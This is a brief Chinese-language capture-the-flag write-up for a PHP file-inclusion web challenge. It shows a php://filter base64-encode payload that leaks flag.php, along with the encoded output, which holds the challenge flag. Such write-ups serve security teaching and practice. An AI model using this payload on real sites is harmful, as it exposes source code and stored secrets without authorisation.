攻防世界28-fileinclude-CTFWeb

文件包含,看源代码

image-20241019102544544

lan不为空则include$lan.php,得到flag在flag.php里,我们要让利用这个漏洞输出源码

php://filter/read/convert.base64-encode/resource=flag

PD9waHANCiRmbGFnPSJjeWJlcnBlYWNlezY1bzQxNzIxZGJlZGViMTFkMTgwYTQ1ZGE3MTViY2FhfSI7DQo/Pg==

base64解码即可